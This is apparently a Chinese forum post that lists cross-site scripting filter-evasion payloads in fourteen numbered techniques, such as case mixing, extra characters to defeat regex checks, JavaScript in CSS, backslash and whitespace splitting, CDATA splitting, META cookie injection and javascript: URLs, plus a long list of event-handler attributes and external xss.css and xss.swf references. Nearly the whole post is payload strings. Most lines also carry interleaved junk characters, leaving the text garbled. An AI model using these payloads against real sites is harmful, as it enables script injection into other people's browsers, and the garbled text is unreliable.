1. 改变字符大小写 t5 ~# G8 a# Y$ ]* W% r& |
' G9 A( w2 M& i/ X! j& Q, f
- ^( }$ t& M" y3 T* P
2 S" N9 @( h% R* n7 ]6 J. E <sCript>alert(‘d’)</scRipT>
2 a) J$ |3 Y2 a1 J4 x: _6 d a# G+ V0 T
2. 利用多加一些其它字符来规避Regular Expression的检查* h1 F* C) }+ }! o
* s( S: g; I8 ~& I3 U
<<script>alert(‘c’)//<</script>
; Q' B9 ^( L6 a- Q5 s* z7 x, Q$ T p8 z! W* [
<SCRIPT a=">" SRC="t.js"></SCRIPT>
9 Z3 K) o8 U% i* E& l% r( u. @6 T7 o
( i# D& [1 z$ n$ b$ ^: U* G <SCRIPT =">" SRC="t.js"></SCRIPT>4 z' B- e6 t4 n$ l+ `) j7 E0 g) T6 I
. r4 o* [. \) ~( u$ _
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>! W! | F/ l( [
, g/ n- p/ Z% p4 {% c% _ <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>/ |% j* U; ]& O$ I2 }, x" n
& y h$ K2 Y: U# u7 L4 A& b <SCRIPT a=`>` SRC="t.js"></SCRIPT>1 p. H1 N$ P9 [( f
8 ]9 E. `: ^8 H8 g; y
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
0 Y/ Z2 u" |/ L) u
# `6 Z% O3 F. Y+ V6 M3 }3. 以其它扩展名取代.js
0 p2 J+ w3 H! k7 S+ e+ }+ w6 i' M9 x. P6 A
<script src="bad.jpg"></script>+ Q% b8 J2 _# N: h2 T8 B
$ e+ N. k5 n0 g$ t3 i$ E
4. 将Javascript写在CSS档里
8 |. M# z9 H k. P G! \5 j; ^/ l
# ]; S# f3 I7 Z1 R A/ L1 Z <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">) I: {1 x2 r/ r9 |/ l
! F; P2 {0 O0 p) k& C. n
example:
9 n' I" X" f4 }- ]+ V: x; \. |8 d& O7 Y
body {
$ A' v, I' i" T5 E; c4 v
9 s0 h' C3 p3 f background-image: url(‘javascript:alert("XSS");’)- E/ Q, _4 F" v" k) E
2 B: z5 m+ F; X# ]5 P0 K9 K
}
. z& g6 E3 _; W+ e {; R+ F' H1 l% T, o+ {1 W' s/ i4 g2 c* P' V
5. 在script的tag里加入一些其它字符( g" S8 O) C5 u9 t8 A
& n& d; e2 N: P- q0 D3 a& K <SCRIPT/SRC="t.js"></SCRIPT>- i' U2 Y+ I# `% Y" d! r
0 }$ e2 } n" e' { <SCRIPT/anyword SRC="t.js"></SCRIPT>0 S* _' x6 r& Y# c
1 w* n5 V: o! d
6. 使用tab或是new line来规避
7 A- _& D b1 z; D+ `
5 O$ X2 {" f9 b6 H& h- d, y <img src="jav ascr ipt:alert(‘XSS3′)">
; S0 n5 Z( D2 R" F' I1 [5 ^' h9 y- K3 x1 ?! L5 s
<img src="jav ascr ipt:alert(‘XSS3′)">
" }# d, S, D' M: V# ^+ r6 b7 r
8 P, d7 d9 Z# E9 e0 T5 G4 | <IMG SRC="jav ascript:alert(‘XSS’);">' ~; h' |1 K! C# K: l- ^
- t! N0 _ k/ T' y# b
-> tag9 A3 S6 i; t% H5 I: F6 n
1 q. W' @$ h) n -> new line
: s; m& f1 \) R" H: g
2 T* y; \8 y+ t/ ]/ T7. 使用"\"来规避* p2 O" M- Q5 Y. Y9 }
8 C1 n# _ D$ p. t+ d/ j
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>+ R8 E* \% h( V$ z' Q2 D t. {
0 Y5 N- z; P# k" }* y6 D% T <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
% @3 r$ a) g* {* k# [
+ j: e) e1 i5 j, r k9 l <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">7 k( g }/ l/ s _5 j7 Q+ u
|" {3 O$ v8 F0 M3 T <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">7 X: P) [5 B: b' K* s$ x+ E7 a P
' v5 C+ \. b8 I+ `! Y+ |9 X <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>6 o. g! V' Y5 Q6 X' [
, B l4 u( v$ i- u2 ?. {8. 使用Hex encode来规避(也可能会把";"拿掉)6 Z7 l$ ^$ D+ o# h8 ~ L
4 M y# {7 |, B
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
! I( \0 d( t2 H8 g! a3 R
, \ h3 N; p6 b6 i0 q6 B 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">2 ]9 V6 i9 H! Z
9 T+ U* \/ z C* j! ^
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">' d1 B9 h3 _1 Z6 ]$ U( Q
0 k3 e& Q; ~- ?4 G! Y& R
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">5 G3 n; M& p" ~9 K. p% @
. x& Q+ h* S1 \. f
9. script in HTML tag
7 w% ]& Y7 [$ q! J( H' u9 T" G8 S
<body onload=」alert(‘onload’)」>
& M; \+ Y, A7 \; A* b4 D5 g; T0 @+ b7 x
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload _2 Z' O! m/ [5 \. c5 E
/ ?4 p6 j) `' W6 N# X
10. 在swf里含有xss的code
5 M& l/ `9 }+ i+ v b4 s3 r6 w5 l
3 S! F- T% M% I. ? <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
% M" d0 Q) ?) z' ^
2 ?3 @" c" K$ x X/ g1 Z8 t1 t9 D11. 利用CDATA将xss的code拆开,再组合起来。$ D/ X# v- e5 K
o' \4 e) ^/ t5 Z1 p$ c1 q <XML ID=I><X><C>
5 Y8 c' e! I- `, s5 X) G6 E+ @6 \1 |& N( X t! r+ [
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
: c+ W6 A# X: q' t$ ~+ a9 h( N8 z! e7 g' a8 l4 r6 G9 C
</C></X>
9 o. E0 E; l$ V& X% K# n% \ F/ ~' B7 j
</xml>
7 z! L0 r/ ^+ V6 [
! n, U0 Y" N7 U0 @4 g# R; ~0 b% N5 Q <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
. i/ Y8 r6 @+ w j9 R4 I
" m; F8 z; n, k7 P! U( A# ? <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
( _& C0 k* {2 Z9 N5 u1 l
, p$ B) ?$ ]1 e <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
# J4 V- [: u! m6 A5 e: y {7 o9 B. a- }: l
12. 利用HTML+TIME。
, `- l$ F/ e! [ n' _( I n7 V+ t2 q; K; F9 b; d
<HTML><BODY>
4 i: Q% w n) {4 b3 }' z4 A: J; f0 D) c1 p/ M* y p. B3 a
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">& _! z( O/ F+ d
$ P0 @* w) h/ N8 i) ^/ J' x9 t <?import namespace="t" implementation="#default#time2">* Y4 Q5 E4 o* u5 W
* t ]' `% V, J& w! [% k& c <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
+ F: U" j5 h: \, V, Y T* p$ l: S3 t2 y# ] Q
</BODY></HTML>
9 S& [# A j- H# g' N& ^# b* l2 p9 a
13. 透过META写入Cookie。$ q$ Y+ z# H+ V5 Z
* t' q2 U4 K* N: q( k# d <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">1 h/ D* v( J$ d) z, N% h7 t
# {/ T( \# ^! D8 G& C O14. javascript in src , href , url
8 c* K$ f- w7 ]/ `4 Z3 G4 n& @; l
4 t/ [! _3 j; t- }6 K8 J% W& ]9 R9 r <IFRAME SRC=javascript:alert(’13′)></IFRAME>$ y+ c/ m" |/ l2 {& w% @
) }2 @/ _8 g6 q! W( D; O: {/ y" b <img src="javascript:alert(‘XSS3′)">3 h3 e, I5 ]. k: w' N7 l
/ ^" R) T7 r5 L" j& N
<IMG DYNSRC="javascript:alert(‘XSS20′)">
2 h, z' P( `' d5 S3 w/ U* }- F @8 s* E k" x
<IMG LOWSRC="javascript:alert(‘XSS21′)">( X+ b! y- v) F. x$ K
' ]6 ~* I' Z% R5 T# p+ H
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">3 q! T2 t8 q# P
4 b( w; I. G+ p2 B' B/ N <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
- y* x- r) Y0 g' S. v% I, z: r# f" I! [5 D- ^6 f# `* l
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
% ~' r! L: P9 R8 y, G
5 }* F) @$ A# e <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">. W2 l9 N! O6 E: R3 ^3 \
3 ?5 I& C% Z( ~+ o+ r <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}2 a/ O6 q, }! H# l9 x
x( {' Z1 s# _* M, z </STYLE><A CLASS=XSS></A>
3 B9 a& O0 ^# ` ]$ n! l1 W% K6 P5 {/ L; D
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>4 J% A) J2 m& D
' d! K! _0 h( G3 M b! }
|
发表于 2012-12-31 09:59:28
收藏
支持
反对